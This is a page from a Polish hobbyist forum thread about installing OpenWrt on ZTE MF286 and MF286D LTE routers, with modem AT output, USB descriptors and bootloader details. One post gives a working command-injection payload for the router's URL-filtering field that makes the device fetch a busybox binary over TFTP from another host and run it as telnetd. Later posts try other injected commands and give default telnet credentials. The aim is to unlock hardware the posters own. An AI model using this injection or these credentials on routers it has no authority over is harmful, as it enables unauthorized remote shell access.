Odp: ZTE MF286 zmiana FW
Nie, mój MF286 ma soft DNA, z wersją B16 chyba.
Nie jesteś zalogowany. Proszę się zalogować lub zarejestrować.
eko.one.pl → Sprzęt / Hardware → ZTE MF286 zmiana FW
Strony Poprzednia 1 … 15 16 17 18 19 … 41 Następna
Zaloguj się lub zarejestruj by napisać odpowiedź
Nie, mój MF286 ma soft DNA, z wersją B16 chyba.
Alternatywnie, mogę spróbować crossflasha na DNA. Gdzieś na dysku miałem paczkę, ale loader wywalał się, pewnie przez uszkodzonego NANDa - zanim tegoż przelutowałem.
Dałbyś rade jakoś sprawdzić, jaką wersję softu raportuje sam modem? Na /dev/ttyUSB2 komenda ATI daje u mnie radę.
ATI
Manufacturer: ZTE CORPORATION
Model: MF286MODULE
Revision: BD_MF286MODULEV1.0.0B03
IMEI: <ciach>
+GCAP: +CGSM
OKFirmware przedstawia się jako ZTE_DNA_MF286_B16, parametry idą jako:
wa_inner_version BD_DNAMF286MODV1.0.0B02
wa_version BD_DNAMF286MODULEV1.0.0B05
Manufacturer: ZTE CORPORATION
Model: MF286MODULE
Revision: BD_DNAMF286MODULEV1.0.0B05Muszę się przyznać że wystawiłem już swojego na licytację jakiś czas temu, więc mogę się nim bawić dopóki ktoś do nie kupi. Trochę będę śmiecił w tym wątku - skompilowałem sobie system z bieżących źródeł, więc będę na bieżąco pisał wrażenia.
Mój się połączył od razu bez żadnych problemów. Oryginalny soft zostawił modem tak:
AT+CGDCONT?
+CGDCONT: 1,"IPV4V6","Internet","0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0",0,0,0,0Skonfigurowałem sekcję wan na qmi, ruszył bez żadnych problemów od pierwszego kopa.
Modem jest w kernelu już, bo ten sam identyfikator ma ME3620_X (19d2:1432), został dodany już w 2019r.
Panowie, wykonajcie u siebie AT+ZRTEMP . Nie znalazłem opisu tego, może to jest od odczytu temperatury, ale u mnie pokazuje cały czas 25, więc trochę mało jak na działający modem.
W MF286D AT+ZRTEMP daje same zera , więc też bezużyteczne:
https://eko.one.pl/forum/viewtopic.php? … 76#p256576
EDIT : A dodał ktoś już modem 19d2:1485 ( ten z MF286D) ? Ja tego nie zrobię ,bo nawet nie wiem gdzie...
Tak, tak, o samo MF286 chodziło.
Nie, nie jest dodany. Aby dodać nowy wysyła się łątkę na listę linux-usb (w tym przypadku) żeby to weszło do kernela linuksowego w przyszłym wydaniu: http://www.linux-usb.org/mailing.html Możesz zobaczyć jak to inni robili na archiwum listy.
Znalazłem! Heh, znalazłem nadal istniejący problem z url filtering, można się dostać do MF286 bez rozbierania urządzenia. W skrócie - zostawili skrypt w systemie który pobiera i wykonuje skrypt, a w połączeniu ze złym parsowaniem url filtering można go wykonać.
0. ustawiamy sobie statyczny adres ip, np. 192.168.1.22 (stosownie do tego co ma router)
1. zakładamy sobie serwer tftp
2. pobieramy plik https://busybox.net/downloads/binaries/ … sybox-mips , zmieniamy jego nazwę na telnetd i kopiujemy go do głównego katalogu serwera tftp
w/w binarka to statycznie skompilowany busybox który zawiera m.in telnetd.
3. Logujemy się do routera do gui, przechodzimy do url filtering
4. w chromie klikamy na polu do wprowadzania adresu, wybieramy z prawego przycisku myszy "zbadaj" i zmieniamy ograniczenie pola z 32 znaków na więcej, np. 332.
Oryginalnie wygląda to tak:
<input type="text" name="addURLFilter" id="addURLFilter" maxlength="32" class="required form-control">a ma być tak:
<input type="text" name="addURLFilter" id="addURLFilter" maxlength="332" class="required form-control">5. Nie zmieniamy zakładki, nie przechodzimy nigdzie, nie ruszamy innych stron. Wpisujemy:
http://aa&zte_debug.sh 192.168.1.22 telnetdDokładnie w takiej postaci. Zepsuty jest parser na stronie, przyjmie to i zapisze. Jako 192.168.1.22 podajemy adres komputera podłączonego do zte na którym jest uruchomiony serwer tftp. Oczywiście pilnujemy że serwer słuchał na tym adresie itd.
Skrypt służy generalnie do zbierania logów, ale umożliwia też pobranie nowego i jego wykonanie. I własnie tu jest to wykorzystywane.
6. Zapisujmy zmiany
Logujemy się teraz telnetem na adres routera (np. 192.168.1.1), login: admin, hasło: takie jak do gui i mamy dostęp do routera.
Działa z moim ZTE286 z softem DNA który nie ma wkompilowanego serwera telnetu.
Wieczorem sprawdzę czy działa to również na ZTE MF286D (skrypt nadal istnieje, więc powinno jak nie zmienili parsera na stronie).
To jest absolutne złoto :-D
I dzięki za testy. Pozwolisz, że umieszczę to w instrukcji instalacji.
Tym sposobem, jest szansa, że klejąc odpowiednio mały initramfs będzie szansa na instalację bez rozkręcania urządzenia. Muszę sięgnąć głębiej do U-boota i zobaczyć w jaki sposób jest ładowany kernel.
@MiG25 pokaż co wypluwa cat /sys/kernel/debug/usb/devices na tym urządzeniu, spróbuję zmajstrować łatkę. Później ja albo Królik możemy to wypchać do kernela. Mam już w tym doświadczenie, dodawałem IDki dla MF283+.
Dla ZTE MF286D jest to:
T: Bus=02 Lev=01 Prnt=01 Port=00 Cnt=01 Dev#= 2 Spd=5000 MxCh= 0
D: Ver= 3.00 Cls=00(>ifc ) Sub=00 Prot=00 MxPS= 9 #Cfgs= 1
P: Vendor=19d2 ProdID=1485 Rev=52.87
S: Manufacturer=ZTE,Incorporated
S: Product=ZTE Technologies MSM
S: SerialNumber=MF286DZTED000000
C:* #Ifs= 7 Cfg#= 1 Atr=80 MxPwr=896mA
A: FirstIf#= 0 IfCount= 2 Cls=02(comm.) Sub=06 Prot=00
I:* If#= 0 Alt= 0 #EPs= 1 Cls=02(comm.) Sub=02 Prot=ff Driver=rndis_host
E: Ad=82(I) Atr=03(Int.) MxPS= 8 Ivl=32ms
I:* If#= 1 Alt= 0 #EPs= 2 Cls=0a(data ) Sub=00 Prot=00 Driver=rndis_host
E: Ad=81(I) Atr=02(Bulk) MxPS=1024 Ivl=0ms
E: Ad=01(O) Atr=02(Bulk) MxPS=1024 Ivl=0ms
I:* If#= 2 Alt= 0 #EPs= 2 Cls=ff(vend.) Sub=ff Prot=ff Driver=option
E: Ad=83(I) Atr=02(Bulk) MxPS=1024 Ivl=0ms
E: Ad=02(O) Atr=02(Bulk) MxPS=1024 Ivl=0ms
I:* If#= 3 Alt= 0 #EPs= 3 Cls=ff(vend.) Sub=ff Prot=ff Driver=option
E: Ad=85(I) Atr=03(Int.) MxPS= 10 Ivl=32ms
E: Ad=84(I) Atr=02(Bulk) MxPS=1024 Ivl=0ms
E: Ad=03(O) Atr=02(Bulk) MxPS=1024 Ivl=0ms
I:* If#= 4 Alt= 0 #EPs= 3 Cls=ff(vend.) Sub=ff Prot=ff Driver=option
E: Ad=87(I) Atr=03(Int.) MxPS= 10 Ivl=32ms
E: Ad=86(I) Atr=02(Bulk) MxPS=1024 Ivl=0ms
E: Ad=04(O) Atr=02(Bulk) MxPS=1024 Ivl=0ms
I:* If#= 5 Alt= 0 #EPs= 3 Cls=ff(vend.) Sub=ff Prot=ff Driver=qmi_wwan
E: Ad=88(I) Atr=03(Int.) MxPS= 8 Ivl=32ms
E: Ad=8e(I) Atr=02(Bulk) MxPS=1024 Ivl=0ms
E: Ad=0f(O) Atr=02(Bulk) MxPS=1024 Ivl=0ms
I:* If#= 6 Alt= 0 #EPs= 2 Cls=ff(vend.) Sub=42 Prot=01 Driver=usbfs
E: Ad=05(O) Atr=02(Bulk) MxPS=1024 Ivl=0ms
E: Ad=89(I) Atr=02(Bulk) MxPS=1024 Ivl=0msW jednym z początkowych postów było.
To jest absolutne złoto :-D.
Tylko sprawdź czy u Ciebie też to działa.
Na MF286D to nie działa. Nawet nie chce pobierać nic tftp..
Na MF286D Próbowałem "ręcznie" uruchomić tego "busybox-armv7l telnetd" z usb, ale pyta o login i hasło... jakie jest ![]()
admin i takie jak do gui?
Miałem przygotować w weekend patche do kernela, ale odcięło mi dostęp do kompa.
Generalnie mam nadzieję, że niedługo będzie koniec.
A gdyby tak wrzucić tego busyboxa na napęd USB i spróbować odpalać go z /tmp/usb_disk/telnetd? Pamiętam, że z samej konsoli dało się go wystartować. Nie pamiętam tylko, czy nie trzeba było podpiąć pendrive sformatowanego jako ext2.
Próbowałem wcześniej i mi nie wyszło, ale być może spieprzyłem coś po drodze.
Nie nie działa. Składniowo nie przyjmuje, sprawdzałem już to wcześniej.
admin i takie jak do gui?
Nie , nie działa...
Miałem przygotować w weekend patche do kernela, ale odcięło mi dostęp do kompa.
Generalnie mam nadzieję, że niedługo będzie koniec.
Trzymam kciuki i czekam na nowy wypust, bo ten działał długo , ale w końcu trzeba bło go włączyć ![]()
A podłączanie do wanu internetu tylko po to ,żeby uqmi instalować trochę upierdliwe..
admin/admin?
BTW, sprawdziłem jaką komendą U-boot odpala kernel w MF286:
bootcmd=nboot 0x81000000 0 0x1300000Znaczy to tyle, że kopiuje obraz do RAM pod adres 0x81000000 z urządzenia NAND 0 spod offsetu 0x1300000. Nie ma tam zaklepanej na pałę wielkości, jest brana z uImage'a. Czyli patent z zapisaniem initramfsa w tym miejscu z poziomu stocka i docelową instalacja po reboocie, powinien zaskoczyć. Sprawdzę to niedługo.
Druga dobra wiadomość jest taka, że mogę sobie przeorganizować flash layout niemal dowolnie i przeznaczyć więcej miejsca na kernel już teraz. 4MB będzie OK? Pamiętam, że na Zyxelu NBG6716 do takiego rozmiaru została zwiększona partycja na kernel.
Edit: znalazłem coś więcej: https://github.com/openwrt/openwrt/pull/4536
I wiem jeszcze mniej. Na MF286 nie ma tego problemu a kernel 5.10 skompresowany LZMA waży jakieś 2,5MB.
Dobra , jest login i hasło do telnet (takie samo jak do samby ) :
login:admin
password: adminZteMf286
Szkoda tylko ,że nie da się tego uruchomić z usb...
@Cezary ,bo tam chyba dysk się automatycznie nie montuje , i chyba lepiej jak on jest w NTFS ... Może najpierw trzeba go zmusić do zamontowania ?
W MF286D? Montuje się, widać jego zawartość przez sambę, działa dysk zrobiony na fat czy ext.
Hm, a gdyby dorzucić na początek coś, co nie zaczyna się od slasha, np. "sh -c" i wyescape'eować jakoś slashe?
Problem jest w tym że w MF286D nic nie chce się wykonywać tak jak jest w MF286. Umiem go obejść i podstawić mu dowolne polecenie w url filtering, ale nic nie działa. Od
http://aa&zte_debug.sh 192.168.32.2 telnetd
przez
http://aa&touch /tmp/usb_disk/abc
a skończywszy na
http://a.pl/&&/tmp/usb_disk/telnetd&& czy wręcz zte_debug.sh 192.168.32.2 telnetd
W MF286D na update działa "włoski" system. Sam parokrotnie wgrywałem przez uboota soft TIM , po czym zmieniałem go na Elisa już toolem ZTE_Sales_Update_Framework. Ten tool sprawdza wersję softu , i jeśli jest ok , to w jakiś sposób coś aktywuje,ze w ooterze się wszystko killuie ,sciąga opogamowanie Elisa i flashuje.
Ustawiłem najpierw na sofcie Playa wersie softu TIMa , i też to poszło ,z tym ,że nie do końca bo router nie wstał...
Dla takiego człowieka jak ja to za trudne zrozumienie tego ,al ktoś bardziej biegły może rozwiąże to , co można w ten sposób wysłac i jaką komendą ![]()
Pany takie głupie pytanko zasilacz do tego MF286D jaki rozmiar ma wtyk ?? 5.5/2.5 czy 5.5/2.1 czy to bez różnicy bo na allegro są takie i takie i nie wiem ?
Ten z małą "dziurą", czyli 2.1mm. Inaczej - pasują standardowe wtyczki od zasilaczy z większości zwykłych routerów.
Strony Poprzednia 1 … 15 16 17 18 19 … 41 Następna
Zaloguj się lub zarejestruj by napisać odpowiedź
eko.one.pl → Sprzęt / Hardware → ZTE MF286 zmiana FW
Forum oparte o PunBB, wspierane przez Informer Technologies, Inc